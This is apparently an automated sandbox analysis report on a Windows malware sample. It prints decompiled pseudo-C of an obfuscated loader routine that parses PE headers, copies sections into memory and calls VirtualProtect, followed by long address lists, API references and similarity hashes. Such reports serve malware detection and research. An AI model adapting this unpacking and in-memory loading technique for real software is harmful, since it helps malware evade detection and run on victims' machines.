				asm("popad");
				return _t202;
			}

0x01057050
0x01057050
0x01057050
0x01057055
0x01057058
0x01057059
0x01057060
0x0105706b
0x01057071
0x0105707d
0x0105707f
0x01057080
0x01057087
0x0105708d
0x0105708d
0x01057094
0x01057097
0x01057098
0x010570c9
0x010570ca
0x010570ce
0x010570d8
0x010570e0
0x010570e0
0x010570e6
0x010570e7
0x010570f5
0x010570f7
0x010570fd
0x01057104
0x0105710d
0x0105710d
0x01057113
0x0105711a
0x0105711a
0x01057124
0x0105712e
0x0105712e
0x01057134
0x0105713d
0x0105713f
0x01057145
0x0105714f
0x01057158
0x01057158
0x0105715e
0x0105716b
0x0105716d
0x01057177
0x0105717a
0x0105717a
0x01057180
0x01057187
0x0105718a
0x01057198
0x0105719c
0x010571a3
0x010571ab
0x010571ae
0x010571ae
0x0105716b
0x010571b1
0x010571b2
0x010571b6
0x010571c0
0x010571c5
0x010571c8
0x010571ce
0x010571d8
0x010571e1
0x010571e9
0x010571ec
0x010571ec
0x010571ef
0x010571fc
0x010571ff
0x01057203
0x0105720c
0x01057214
0x01057217
0x01057217
0x0105721a
0x0105722b
0x0105722e
0x01057231
0x01057234
0x0105723b
0x0105723e
0x01057247
0x01057253
0x01057256
0x01057256
0x01057259
0x01057266
0x01057268
0x01057271
0x01057274
0x0105727a
0x0105727a
0x01057287
0x01057294
0x0105729c
0x0105729c
0x010572a2
0x010572a2
0x010572af
0x010572b1
0x010572b8
0x010572c3
0x010572c7
0x010572ce
0x010572d4
0x010572d7
0x010572d7
0x010572da
0x010572de
0x010572e1
0x010572eb
0x010572ed
0x010572f3
0x010572f3
0x010572f9
0x010572fa
0x010572fe
0x01057308
0x0105730a
0x01057310
0x01057310
0x01057316
0x0105731d
0x0105731d
0x01057327
0x01057329
0x01057329
0x0105732f
0x01057339
0x0105733c
0x0105734a
0x0105734e
0x0105734f
0x01057355
0x01057355
0x0105735b
0x0105735c
0x01057363
0x0105736f
0x01057377
0x01057377
0x0105737d
0x0105738a
0x0105738f
0x01057392
0x01057398
0x010573a4
0x010573a7
0x010573a7
0x0105738a
0x010573aa
0x010573ab
0x010573b9
0x010573be
0x010573c1
0x010573c7
0x010573d3
0x010573d6
0x010573d6
0x010573d9
0x010573da
0x010573e1
0x010573eb
0x010573ed
0x010573f7
0x010573fa
0x010573fa
0x01057400
0x0105740a
0x0105740d
0x0105741b
0x01057427
0x0105742a
0x0105742d
0x01057439
0x0105743b
0x01057445
0x0105744e
0x01057456
0x01057459
0x01057459
0x0105745e
0x0105746b
0x0105746d
0x01057474
0x01057478
0x01057481
0x01057481
0x01057487
0x0105748e
0x0105748e
0x01057498
0x010574a0
0x010574a0
0x010574a6
0x010574ad
0x010574ad
0x010574b7
0x010574bf
0x010574bf
0x010574c5
0x010574d1
0x010574da
0x010574dd
0x010574e3
0x010574e3
0x010574d1
0x010574e9
0x010574f6
0x010574f9
0x010574fd
0x01057500
0x01057506
0x0105750d
0x01057510
0x01057516
0x0105751e
0x01057521
0x01057521
0x01057524
0x01057531
0x01057536
0x0105753b
0x01057541
0x01057549
0x0105754c
0x0105754c
0x01057552
0x01057554
0x01057556
0x01057557
0x01057564
0x01057567
0x0105756a
0x01057573
0x01057579
0x0105757c
0x0105757c
0x0105757f
0x01057580
0x01057584
0x0105758e
0x01057591
0x01057595
0x01057598
0x010575a1
0x010575aa
0x010575b0
0x010575b3
0x010575b3
0x010575b6
0x010575c2
0x010575c7
0x010575ca
0x010575d0
0x010575d8
0x010575db
0x010575db
0x010575c2
0x010575e5
0x010575e6
0x010575e6
0x010575e6
0x010575ee
0x010575f0
0x010575f8
0x010575fc
0x010575fd
0x01057602
0x0105760a
0x0105760f
0x01057615
0x01057625
0x01057628
0x01057628
0x01057634
0x0105763e
0x01057641
0x01057643

APIs

VirtualAlloc.KERNELBASE(00000000), ref: 0105715E
VirtualProtect.KERNELBASE(?,008B95B8), ref: 0105737D
VirtualFree.KERNELBASE(?,00000000,?,00000000), ref: 01057628

Memory Dump Source

Source File: 00000001.00000002.716530943.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true

Similarity

API ID: Virtual$AllocFreeProtect
String ID:
API String ID: 267585107-0
Opcode ID: 70d718f6fdee01f142bde9e812bcc5f6759f01a192b11c1b40fa0dde40f4dd7e
Instruction ID: a275cf093af192e164dd19c487cf7452e95447750ddd23e8883f886e1f426eb6
Opcode Fuzzy Hash: 70d718f6fdee01f142bde9e812bcc5f6759f01a192b11c1b40fa0dde40f4dd7e
Instruction Fuzzy Hash: F4121F70804304DFEB60AF64C4C976ABBF4EF04316F1844A9EC899E24BD73459A0DF2A

Uniqueness

Uniqueness Score: -1.00%

Function 0105822A, Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 372
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 55%

			E0105822A(signed int __ebx, signed int __ecx, signed int __edx, void* __edi, signed int __esi, signed int _a4) {
				int _v8;
				signed int _v12;
				signed int _v28;
				signed int _v32;
				void* __ebp;
				signed int _t303;
				signed int _t304;
				int _t305;
				void* _t306;
				intOrPtr _t308;
				void* _t309;
				signed int _t312;
				signed int _t315;
				signed int _t316;
				signed int _t322;
				signed int _t325;
				signed int _t327;
				signed int _t330;
				signed int _t336;
				signed int _t339;
				signed int _t340;
				intOrPtr* _t358;
				signed int _t363;
				signed int _t365;
				signed int _t367;
				signed int _t375;
				signed int _t379;
				int _t380;
				signed int _t398;
				void* _t414;
				signed int _t415;
				signed int _t416;
				signed int _t418;
				signed int _t419;
				intOrPtr _t420;
				void* _t421;
				signed int _t425;
				signed int _t427;
				signed int _t430;
				signed int _t431;
				signed int _t432;
				signed int _t436;
				signed int _t438;
				signed int _t440;
				void* _t441;
				signed int _t442;
				signed int _t446;
				signed int* _t447;
				signed int* _t448;

				_t432 = __esi;
				_t414 = __edi;
				_t397 = __edx;
				_t378 = __ecx;
				_t375 = __ebx;
				if( *((intOrPtr*)(__ebx + 0x45c754)) == 0) {
					_push(_v12);
					 *_t447 = __ecx;
					_push(_v12);
					 *_t447 = __edx;
					 *((intOrPtr*)(__ebx + 0x45c754)) =  *((intOrPtr*)(__ebx + 0x45d64c))();
					_pop( *_t6);
					_t397 = _v12;
					_t378 =  *_t447;
					_t447 = _t447 - 0xfffffffc;
				}
				if( *((intOrPtr*)(_t375 + 0x45c370)) == 0) {
					if( *((intOrPtr*)(_t375 + 0x45c500)) == 0) {
						 *_t447 = _t378;
						_v12 = _v12 & 0x00000000;
						 *_t447 =  *_t447 + _t397;
						_v12 = _v12 & 0x00000000;
						 *_t447 =  *_t447 ^ _t375 + 0x0045ca94;
						 *((intOrPtr*)(_t375 + 0x45c500)) =  *((intOrPtr*)(_t375 + 0x45d678))(_v12, _v12, _v12);
						_pop( *_t20);
						_t397 = 0 ^ _v12;
						_pop( *_t22);
						_t378 = 0 ^ _v12;
					}
					 *_t447 =  *_t447 & 0x00000000;
					 *_t447 =  *_t447 + _t378;
					 *_t447 = _t397;
					 *((intOrPtr*)(_t375 + 0x45c370)) =  *((intOrPtr*)(_t375 + 0x45d670))(_v12, _t414);
					_t397 =  *_t447;
					_t447 =  &(_t447[1]);
					_pop( *_t27);
					_t378 = _t378 & 0x00000000 | _v12;
				}
				_push(_t375);
				 *_t447 =  *_t447 & 0x00000000;
				 *_t447 =  *_t447 ^ _t397;
				if( *((intOrPtr*)(_t375 + 0x45ce9c)) == 0) {
					 *_t447 = _t378;
					 *((intOrPtr*)(_t375 + 0x45ce9c)) =  *((intOrPtr*)(_t375 + 0x45d648))(_v12);
					_t378 =  *_t447;
					_t447 =  &(_t447[1]);
				}
				_push(_v12);
				 *_t447 = _t378;
				if( *((intOrPtr*)(_t375 + 0x45d42c)) == 0) {
					 *_t447 = 1;
					 *((intOrPtr*)(_t375 + 0x45d42c)) =  *((intOrPtr*)(_t375 + 0x45d6f0))(_t447);
				}
				_t303 = _a4;
				if( *(_t375 + 0x45d290) == 0) {
					 *_t447 = _t303;
					_t367 =  *((intOrPtr*)(_t375 + 0x45d648))(_v12);
					 *(_t375 + 0x45d290) = _t367;
					_pop( *_t42);
					_t303 = (_t367 & 0x00000000) + _v12;
				}
				_v12 = _t432;
				_t304 =  *((intOrPtr*)(_t303 + 0x3c)) + _t303;
				if( *(_t375 + 0x45ccdc) == 0) {
					 *_t447 = _t304;
					_t365 =  *((intOrPtr*)(_t375 + 0x45d648))(_v12);
					 *(_t375 + 0x45ccdc) = _t365;
					_pop( *_t51);
					_t304 = _t365 & 0x00000000 | _v12;
				}
				_push(_t397);
				 *_t447 =  *_t447 & 0x00000000;
				 *_t447 =  *_t447 + _t304;
				if( *(_t375 + 0x45c288) == 0) {
					_v12 = _v12 & 0x00000000;
					_v28 = _v28 + _t304;
					_t363 =  *((intOrPtr*)(_t375 + 0x45d670))(_v12);
					 *(_t375 + 0x45c288) = _t363;
					_t304 = _t363 & 0x00000000 | _v28;
					_t447 =  &(_t447[1]);
				}
				_t415 = _t304;
				if( *((intOrPtr*)(_t375 + 0x45cd50)) == 0) {
					_v12 = 0;
					_v28 = _v28 + _t375 + 0x45c414;
					 *((intOrPtr*)(_t375 + 0x45cd50)) =  *((intOrPtr*)(_t375 + 0x45d678))(_v12);
				}
				_t305 =  *(_t415 + 6) & 0x0000ffff;
				if( *((intOrPtr*)(_t375 + 0x45c430)) == 0) {
					_v12 = _v12 & 0x00000000;
					_v28 = _v28 ^ _t305;
					_t358 = _t375 + 0x45cb0c;
					_v32 = _v32 & 0x00000000;
					_v32 = _v32 + _t358;
					 *_t358 = 0x30;
					 *((intOrPtr*)(_t375 + 0x45c430)) =  *((intOrPtr*)(_t375 + 0x45d6f4))(0, _t375, _v12);
					_t305 = 0 ^  *_t447;
					_t447 = _t447 - 0xfffffffc;
				}
				_v8 = _t305;
				if( *(_t375 + 0x45cfc8) == 0) {
					_t305 =  *((intOrPtr*)(_t375 + 0x45d648))();
					 *(_t375 + 0x45cfc8) = _t305;
				}
				_push(_v12);
				_v28 = _t415;
				if( *(_t375 + 0x45c920) == 0) {
					_v12 = 0;
					_v32 = _v32 ^ _t375 + 0x0045d378;
					_t305 =  *((intOrPtr*)(_t375 + 0x45d674))(_v12);
					 *(_t375 + 0x45c920) = _t305;
				}
				_t398 =  *(_t415 + 0x54);
				if( *(_t375 + 0x45c098) == 0) {
					_v32 = _t398;
					_v12 = _v12 & 0x00000000;
					 *_t447 =  *_t447 ^ _t375 + 0x0045c03c;
					_t305 =  *((intOrPtr*)(_t375 + 0x45d678))(_v12, _v12);
					 *(_t375 + 0x45c098) = _t305;
					_pop( *_t93);
					_t398 = 0 + _v12;
				}
				_t416 =  *(_t375 + 0x45ca68);
				if( *(_t375 + 0x45d150) == 0) {
					_v32 = _v32 & 0x00000000;
					_v32 = _v32 + _t398;
					_t305 =  *((intOrPtr*)(_t375 + 0x45d648))(_t378);
					 *(_t375 + 0x45d150) = _t305;
					_t398 = (_t398 & 0x00000000) + _v32;
					_t447 =  &(_t447[1]);
				}
				_t436 = _a4;
				if( *(_t375 + 0x45c270) == 0) {
					_v32 = _t398;
					 *_t447 =  *_t447 - _t446;
					 *_t447 =  *_t447 + _t375 + 0x45d3c8;
					_t305 =  *((intOrPtr*)(_t375 + 0x45d674))(_v12);
					 *(_t375 + 0x45c270) = _t305;
					 *_t105 = _t446;
					_t398 = 0 + _v12;
				}
				_t379 = _t398;
				if( *(_t375 + 0x45cdf0) == 0) {
					_v12 = _v12 & 0x00000000;
					_v32 = _v32 | _t379;
					_v12 = 0;
					 *_t447 =  *_t447 + _t398;
					_t305 =  *((intOrPtr*)(_t375 + 0x45d670))(_v12, _v12);
					 *(_t375 + 0x45cdf0) = _t305;
					_t398 =  *_t447;
					_t447 = _t447 - 0xfffffffc;
					_pop( *_t115);
					_t379 = _t379 & 0x00000000 | _v12;
				}
				if(_t416 == _t436) {
					L56:
					_pop( *_t184);
					_t418 = 0 ^ _v12;
					if( *(_t375 + 0x45c178) == 0) {
						_v28 = _v28 & 0x00000000;
						_v28 = _v28 + _t375 + 0x45cbf0;
						_t305 =  *((intOrPtr*)(_t375 + 0x45d678))(_t375);
						 *(_t375 + 0x45c178) = _t305;
					}
					_push(_t436);
					_t438 = _t418 + 0xf8;
					_t419 = _t438;
					if( *(_t375 + 0x45cf04) == 0) {
						_t305 =  *((intOrPtr*)(_t375 + 0x45d64c))();
						 *(_t375 + 0x45cf04) = _t305;
					}
					do {
						_push(_t398);
						_v28 = _v28 - _t398;
						_v28 = _t419;
						if( *(_t375 + 0x45c258) == 0) {
							_t312 = _t375 + 0x45cf4c;
							_v32 = _v32 - _t398;
							_v32 = _v32 ^ _t312;
							 *_t312 = 0x30;
							 *_t447 =  *(_t375 + 0x45c890);
							_t305 =  *((intOrPtr*)(_t375 + 0x45d6f4))(_t312, _t398);
							 *(_t375 + 0x45c258) = _t305;
						}
						_t440 = _a4;
						if( *(_t375 + 0x45ce04) == 0) {
							_t305 =  *((intOrPtr*)(_t375 + 0x45d648))();
							 *(_t375 + 0x45ce04) = _t305;
						}
						_t380 =  *(_t419 + 0x10);
						if( *(_t375 + 0x45c960) == 0) {
							_v12 = _v12 & 0x00000000;
							_v32 = _v32 ^ _t380;
							_t305 =  *((intOrPtr*)(_t375 + 0x45d64c))(_v12);
							 *(_t375 + 0x45c960) = _t305;
							_pop( *_t210);
							_t380 = _t380 & 0x00000000 | _v12;
						}
						_v32 = _v32 | _t305;
						_t306 = _t440;
						_t441 = _t306 +  *((intOrPtr*)(_t419 + 0x14));
						_t308 = 0;
						if( *((intOrPtr*)(_t375 + 0x45c8f4)) == 0) {
							_v32 = _v32 & 0x00000000;
							_v32 = _v32 | _t380;
							_t336 = _t375 + 0x45ce58;
							 *_t447 = _t336;
							 *_t336 = 0x30;
							_t308 =  *((intOrPtr*)(_t375 + 0x45d6f4))(0, _v12, _t446);
							 *((intOrPtr*)(_t375 + 0x45c8f4)) = _t308;
							_t380 =  *_t447;
							_t447 =  &(_t447[1]);
						}
						_t420 =  *((intOrPtr*)(_t419 + 0xc));
						if( *((intOrPtr*)(_t375 + 0x45c6bc)) == 0) {
							_v12 = _v12 & 0x00000000;
							_v32 = _v32 | _t380;
							 *_t447 =  *_t447 + 1;
							 *_t447 =  *_t447 - _t375;
							_t308 =  *((intOrPtr*)(_t375 + 0x45d6f0))(_t375, _v12);
							 *((intOrPtr*)(_t375 + 0x45c6bc)) = _t308;
							_t380 = _t380 & 0x00000000 ^  *_t447;
							_t447 = _t447 - 0xfffffffc;
						}
						_push(0);
						_v32 = _v32 + _t308;
						_t309 = _t420;
						_t421 = _t309 +  *(_t375 + 0x45ca68);
						if( *((intOrPtr*)(_t375 + 0x45d3f0)) == 0) {
							_v12 = 0;
							_v32 = _v32 + _t380;
							 *_t447 =  *_t447 & 0x00000000;
							 *_t447 =  *_t447 ^ _t375 + 0x0045d12c;
							 *((intOrPtr*)(_t375 + 0x45d3f0)) =  *((intOrPtr*)(_t375 + 0x45d678))(_t441, _v12);
							_t380 =  *_t447;
							_t447 =  &(_t447[1]);
						}
						_t305 = memcpy(_t421, _t441, _t380);
						_t447 =  &(_t447[3]);
						if( *(_t375 + 0x45c78c) == 0) {
							_v12 = _v12 & 0x00000000;
							_v32 = _v32 | _t375 + 0x0045cc10;
							_t305 =  *((intOrPtr*)(_t375 + 0x45d674))(_v12);
							 *(_t375 + 0x45c78c) = _t305;
						}
						_pop( *_t239);
						_t425 = _v12;
						if( *(_t375 + 0x45c268) == 0) {
							_t305 =  *((intOrPtr*)(_t375 + 0x45d64c))();
							 *(_t375 + 0x45c268) = _t305;
						}
						_t419 = _t425 + 0x28;
						_t375 = _t375;
						if( *(_t375 + 0x45c200) == 0) {
							_t330 = _t375 + 0x45c110;
							_v28 = _v28 & 0x00000000;
							_v28 = _v28 | _t330;
							 *_t330 = 0x30;
							_v32 =  *((intOrPtr*)(_t375 + 0x45c34c));
							_t305 =  *((intOrPtr*)(_t375 + 0x45d6f4))(_t330, 0, 0);
							 *(_t375 + 0x45c200) = _t305;
						}
						_t250 =  &_v8;
						 *_t250 = _v8 - 1;
					} while ( *_t250 != 0);
					if( *((intOrPtr*)(_t375 + 0x45d1f0)) == 0) {
						 *((intOrPtr*)(_t375 + 0x45d1f0)) =  *((intOrPtr*)(_t375 + 0x45d6f0))(0);
					}
					_t427 = _t419 & 0x00000000 ^  *_t447;
					_t448 =  &(_t447[1]);
					if( *((intOrPtr*)(_t375 + 0x45c168)) == 0) {
						_t327 = _t375 + 0x45c3a8;
						 *_t448 =  *_t448 - _t398;
						 *_t448 =  *_t448 ^ _t327;
						 *_t327 = 0x30;
						_v28 =  *((intOrPtr*)(_t375 + 0x45cd54));
						 *((intOrPtr*)(_t375 + 0x45c168)) =  *((intOrPtr*)(_t375 + 0x45d6f4))(_t441, _t398);
					}
					_t315 =  *(_t427 + 0x28);
					if( *(_t375 + 0x45c97c) == 0) {
						 *_t448 =  *_t448 & 0x00000000;
						 *_t448 =  *_t448 | _t315;
						_v28 = _v28 & 0x00000000;
						_v28 = _v28 ^ _t375 + 0x0045ced8;
						_t325 =  *((intOrPtr*)(_t375 + 0x45d678))(_t398, 0);
						 *(_t375 + 0x45c97c) = _t325;
						_t315 = (_t325 & 0x00000000) + _v28;
						_t448 = _t448 - 0xfffffffc;
					}
					_v12 = _t427;
					_push( *(_t375 + 0x45ca68) + _t315);
					_t430 = _v12;
					_pop(_t316);
					if( *(_t375 + 0x45cd94) == 0) {
						 *_t448 =  *_t448 - _t446;
						 *_t448 = _t316;
						_t322 =  *((intOrPtr*)(_t375 + 0x45d648))(_t446);
						 *(_t375 + 0x45cd94) = _t322;
						_t316 = _t322 & 0x00000000 ^  *_t448;
						_t448 =  &(_t448[1]);
					}
					 *(_t375 + 0x45c538) = _t316;
					if( *(_t375 + 0x45c43c) == 0) {
						_t316 =  *((intOrPtr*)(_t375 + 0x45d64c))();
						 *(_t375 + 0x45c43c) = _t316;
					}
					_t442 =  *(_t375 + 0x45ca68);
					if( *(_t375 + 0x45cd24) == 0) {
						 *_t448 = _t375 + 0x45cec0;
						_t316 =  *((intOrPtr*)(_t375 + 0x45d678))(_v12);
						 *(_t375 + 0x45cd24) = _t316;
					}
					if(_t442 > 0) {
						if( *((intOrPtr*)(_t375 + 0x45c1b4)) == 0) {
							 *((intOrPtr*)(_t375 + 0x45c1b4)) =  *((intOrPtr*)(_t375 + 0x45d648))();
						}
						_push(_t446);
						 *_t448 =  *_t448 - _t446;
						 *_t448 =  *_t448 + _t442;
						if( *((intOrPtr*)(_t375 + 0x45c148)) == 0) {
							_v28 =  *(_t375 + 0x45c91c);
							 *((intOrPtr*)(_t375 + 0x45c148)) =  *((intOrPtr*)(_t375 + 0x45d6f0))(0, _t430);
						}
						_t317 = E0105538D(_t375, _t398, _t430, _t442); // executed
						if( *((intOrPtr*)(_t375 + 0x45cf30)) == 0) {
							_v12 = 0;
							 *_t448 =  *_t448 + _t375 + 0x45c550;
							 *((intOrPtr*)(_t375 + 0x45cf30)) =  *((intOrPtr*)(_t375 + 0x45d674))(_v12);
						}
						_v12 = _v12 & 0x00000000;
						 *_t448 =  *_t448 ^ _t442;
						_t316 = E01056A58(_t317, _t375, _t398, _t430, _t442, _v12);
					}
					_pop( *_t299);
					_pop( *_t301);
					return _t316;
				} else {
					if( *((intOrPtr*)(_t375 + 0x45c35c)) == 0) {
						_v12 = _v12 & 0x00000000;
						_v32 = _v32 + _t379;
						 *_t447 =  *_t447 - _t379;
						 *_t447 = _t398;
						 *_t447 =  *_t447 - _t446;
						 *_t447 =  *_t447 + _t375 + 0x45c544;
						 *((intOrPtr*)(_t375 + 0x45c35c)) =  *((intOrPtr*)(_t375 + 0x45d674))(_t379, _v12);
						_t398 = (_t398 & 0x00000000) +  *_t447;
						_t447 = _t447 - 0xfffffffc;
						 *_t124 = _t446;
						_t379 = _t379 & 0x00000000 ^ _v12;
					}
					do {
						asm("movsb");
						if( *((intOrPtr*)(_t375 + 0x45c4f8)) == 0) {
							_v32 = _v32 - _t398;
							_v32 = _v32 | _t379;
							 *_t447 = _t398;
							 *((intOrPtr*)(_t375 + 0x45c4f8)) =  *((intOrPtr*)(_t375 + 0x45d64c))(_v12, _t398);
							_pop( *_t130);
							_t398 = _t398 & 0x00000000 ^ _v12;
							_t379 = _v32;
							_t447 =  &(_t447[1]);
						}
						_t379 = _t379 - 1;
					} while (_t379 != 0);
					if( *((intOrPtr*)(_t375 + 0x45d0b0)) == 0) {
						_v12 = 0;
						_v32 = _v32 | _t398;
						 *_t447 =  *_t447 - _t436;
						 *_t447 =  *_t447 + _t375 + 0x45c8b8;
						 *((intOrPtr*)(_t375 + 0x45d0b0)) =  *((intOrPtr*)(_t375 + 0x45d678))(_t436, _v12);
						_t398 = 0 ^  *_t447;
						_t447 =  &(_t447[1]);
					}
					_t431 =  *(_t375 + 0x45ca68);
					if( *((intOrPtr*)(_t375 + 0x45d3a8)) == 0) {
						_v12 = _v12 & 0x00000000;
						_v32 = _v32 ^ _t398;
						 *((intOrPtr*)(_t375 + 0x45d3a8)) =  *((intOrPtr*)(_t375 + 0x45d6f0))(0, _v12);
						_t398 =  *_t447;
						_t447 =  &(_t447[1]);
					}
					 *((intOrPtr*)(_t375 + 0x45c42c)) = 0x40;
					if( *((intOrPtr*)(_t375 + 0x45cd48)) == 0) {
						_v32 = _t398;
						 *_t447 =  *_t447 ^ _t375;
						 *_t447 =  *_t447 | _t375 + 0x0045cf40;
						 *((intOrPtr*)(_t375 + 0x45cd48)) =  *((intOrPtr*)(_t375 + 0x45d674))(_t375, _v12);
						_t398 = 0 ^  *_t447;
						_t447 = _t447 - 0xfffffffc;
					}
					_t339 = _t375 + 0x45c42c;
					if( *((intOrPtr*)(_t375 + 0x45c874)) == 0) {
						_v32 = _t339;
						_v12 = 0;
						 *_t447 =  *_t447 ^ _t398;
						 *((intOrPtr*)(_t375 + 0x45c874)) =  *((intOrPtr*)(_t375 + 0x45d64c))(_v12, _v12);
						_t398 = (_t398 & 0x00000000) +  *_t447;
						_t339 = _v32;
						_t447 =  &((_t447 - 0xfffffffc)[1]);
					}
					_push(_t431);
					_v32 = _v32 & 0x00000000;
					_v32 = _v32 + _t339;
					if( *((intOrPtr*)(_t375 + 0x45cea8)) == 0) {
						 *_t447 =  *_t447 & 0x00000000;
						 *_t447 =  *_t447 ^ _t398;
						 *_t447 =  *_t447 ^ _t446;
						 *_t447 =  *_t447 ^ _t375 + 0x0045c088;
						 *((intOrPtr*)(_t375 + 0x45cea8)) =  *((intOrPtr*)(_t375 + 0x45d678))(_t446, _t431);
						_t398 = 0 ^  *_t447;
						_t447 = _t447 - 0xfffffffc;
					}
					_push(_t446);
					 *_t447 =  *_t447 + 2;
					 *_t447 =  *_t447 - _t446;
					if( *((intOrPtr*)(_t375 + 0x45c794)) == 0) {
						 *_t447 =  *_t447 & 0x00000000;
						 *_t447 =  *_t447 + _t398;
						 *((intOrPtr*)(_t375 + 0x45c794)) =  *((intOrPtr*)(_t375 + 0x45d64c))(_t375);
						_t398 =  *_t447;
						_t447 = _t447 - 0xfffffffc;
					}
					_v12 = 0;
					_push(_v12);
					 *_t447 =  *_t447 + _t398;
					if( *((intOrPtr*)(_t375 + 0x45c598)) == 0) {
						_t436 =  *_t447;
						 *_t447 =  *(_t375 + 0x45c728);
						 *((intOrPtr*)(_t375 + 0x45c598)) =  *((intOrPtr*)(_t375 + 0x45d6f0))(_t436);
					}
					_push(_v12);
					 *_t447 = _t431;
					if( *((intOrPtr*)(_t375 + 0x45d144)) == 0) {
						_t340 = _t375 + 0x45c928;
						_v12 = _v12 & 0x00000000;
						 *_t447 =  *_t447 ^ _t340;
						 *_t340 = 0x30;
						 *((intOrPtr*)(_t375 + 0x45d144)) =  *((intOrPtr*)(_t375 + 0x45d6f4))(0, _v12);
					}
					_t305 = VirtualProtect();
					if( *(_t375 + 0x45c074) == 0) {
						_t305 =  *((intOrPtr*)(_t375 + 0x45d670))();
						 *(_t375 + 0x45c074) = _t305;
					}
					goto L56;
				}
			}

0x0105822a
0x0105822a
0x0105822a
0x0105822a
0x0105822a
0x01058237
0x01058239
0x0105823c
0x0105823f
0x01058242
0x0105824b
0x01058251
0x01058254
0x01058259
0x0105825c
0x0105825c
0x01058266
0x0105826f
0x01058274
0x01058277
0x0105827e
0x01058287
0x0105828e
0x01058297
0x0105829f
0x010582a2
0x010582a7
0x010582aa
0x010582aa
0x010582ae
0x010582b2
0x010582b8
0x010582c1
0x010582c9
0x010582cc
0x010582d5
0x010582d8
0x010582d8
0x010582db
0x010582dc
0x010582e0
0x010582ea
0x010582ef
0x010582f8
0x01058304
0x01058307
0x01058307
0x0105830a
0x0105830d
0x01058317
0x0105831a
0x01058327
0x01058327
0x0105832d
0x01058337
0x0105833c
0x0105833f
0x01058345
0x01058351
0x01058354
0x01058354
0x01058357
0x01058363
0x0105836b
0x01058370
0x01058373
0x01058379
0x01058385
0x01058388
0x01058388
0x0105838b
0x0105838c
0x01058390
0x0105839a
0x0105839c
0x010583a3
0x010583a6
0x010583ac
0x010583b8
0x010583bb
0x010583bb
0x010583be
0x010583c7
0x010583cf
0x010583d9
0x010583e2
0x010583e2
0x010583e8
0x010583f3
0x010583f5
0x010583fc
0x010583ff
0x01058406
0x0105840a
0x0105840d
0x0105841b
0x01058423
0x01058426
0x01058426
0x01058429
0x01058433
0x01058435
0x0105843b
0x0105843b
0x01058441
0x01058444
0x0105844e
0x01058456
0x01058460
0x01058463
0x01058469
0x01058469
0x0105846f
0x01058479
0x0105847e
0x01058487
0x0105848e
0x01058491
0x01058497
0x0105849f
0x010584a2
0x010584a2
0x010584a5
0x010584b2
0x010584b5
0x010584b9
0x010584bc
0x010584c2
0x010584ce
0x010584d1
0x010584d1
0x010584d4
0x010584de
0x010584e3
0x010584ed
0x010584f0
0x010584f3
0x010584f9
0x01058501
0x01058504
0x01058504
0x01058507
0x01058510
0x01058512
0x01058519
0x0105851c
0x01058526
0x01058529
0x0105852f
0x01058537
0x0105853a
0x01058543
0x01058546
0x01058546
0x0105854b
0x01058799
0x0105879b
0x0105879e
0x010587a8
0x010587b1
0x010587b5
0x010587b8
0x010587be
0x010587be
0x010587c4
0x010587c7
0x010587cd
0x010587d7
0x010587d9
0x010587df
0x010587df
0x010587e5
0x010587e5
0x010587e6
0x010587e9
0x010587f3
0x010587f5
0x010587fc
0x010587ff
0x01058802
0x0105880f
0x01058812
0x01058818
0x01058818
0x0105881e
0x01058828
0x0105882a
0x01058830
0x01058830
0x01058836
0x01058840
0x01058842
0x01058849
0x0105884c
0x01058852
0x0105885e
0x01058861
0x01058861
0x01058866
0x0105886a
0x0105886e
0x01058870
0x01058878
0x0105887b
0x0105887f
0x01058882
0x0105888b
0x0105888e
0x01058896
0x0105889c
0x010588a8
0x010588ab
0x010588ab
0x010588ae
0x010588b8
0x010588ba
0x010588c1
0x010588c5
0x010588c9
0x010588cc
0x010588d2
0x010588de
0x010588e1
0x010588e1
0x010588e4
0x010588e6
0x010588ea
0x010588f1
0x010588fb
0x010588fd
0x01058907
0x01058911
0x01058915
0x0105891e
0x01058926
0x01058929
0x01058929
0x0105892c
0x0105892c
0x01058935
0x0105893d
0x01058944
0x01058947
0x0105894d
0x0105894d
0x01058955
0x01058958
0x01058962
0x01058964
0x0105896a
0x0105896a
0x01058979
0x0105897b
0x01058983
0x01058985
0x0105898c
0x01058990
0x01058993
0x010589a1
0x010589a6
0x010589ac
0x010589ac
0x010589b2
0x010589b2
0x010589b2
0x010589c2
0x010589cc
0x010589cc
0x010589d8
0x010589db
0x010589e5
0x010589e7
0x010589ee
0x010589f1
0x010589f4
0x01058a01
0x01058a0a
0x01058a0a
0x01058a10
0x01058a1a
0x01058a1d
0x01058a21
0x01058a2b
0x01058a2f
0x01058a32
0x01058a38
0x01058a44
0x01058a47
0x01058a47
0x01058a4a
0x01058a55
0x01058a56
0x01058a59
0x01058a61
0x01058a64
0x01058a67
0x01058a6a
0x01058a70
0x01058a7c
0x01058a7f
0x01058a7f
0x01058a82
0x01058a8f
0x01058a91
0x01058a97
0x01058a97
0x01058a9d
0x01058aaa
0x01058ab5
0x01058ab8
0x01058abe
0x01058abe
0x01058ac7
0x01058ad0
0x01058ad8
0x01058ad8
0x01058ade
0x01058adf
0x01058ae2
0x01058aec
0x01058af6
0x01058b01
0x01058b01
0x01058b07
0x01058b13
0x01058b1b
0x01058b25
0x01058b2e
0x01058b2e
0x01058b34
0x01058b3b
0x01058b3e
0x01058b3e
0x01058b45
0x01058b4b
0x01058b52
0x01058551
0x01058558
0x0105855a
0x01058561
0x01058565
0x01058568
0x01058572
0x01058575
0x0105857e
0x0105858a
0x0105858d
0x01058596
0x01058599
0x01058599
0x0105859c
0x0105859c
0x010585a4
0x010585a7
0x010585aa
0x010585b0
0x010585b9
0x010585c5
0x010585c8
0x010585cd
0x010585d0
0x010585d0
0x010585d3
0x010585d3
0x010585dd
0x010585df
0x010585e9
0x010585f3
0x010585f6
0x010585ff
0x01058607
0x0105860a
0x0105860a
0x0105860d
0x0105861a
0x0105861c
0x01058623
0x0105862e
0x01058636
0x01058639
0x01058639
0x0105863c
0x0105864d
0x01058652
0x0105865c
0x0105865f
0x01058668
0x01058670
0x01058673
0x01058673
0x01058676
0x01058683
0x01058688
0x0105868b
0x01058695
0x0105869e
0x010586aa
0x010586b2
0x010586b5
0x010586b5
0x010586b8
0x010586b9
0x010586bd
0x010586c7
0x010586ca
0x010586ce
0x010586d8
0x010586db
0x010586e4
0x010586ec
0x010586ef
0x010586ef
0x010586f2
0x010586f3
0x010586f7
0x01058701
0x01058704
0x01058708
0x01058711
0x01058719
0x0105871c
0x0105871c
0x0105871f
0x01058726
0x01058729
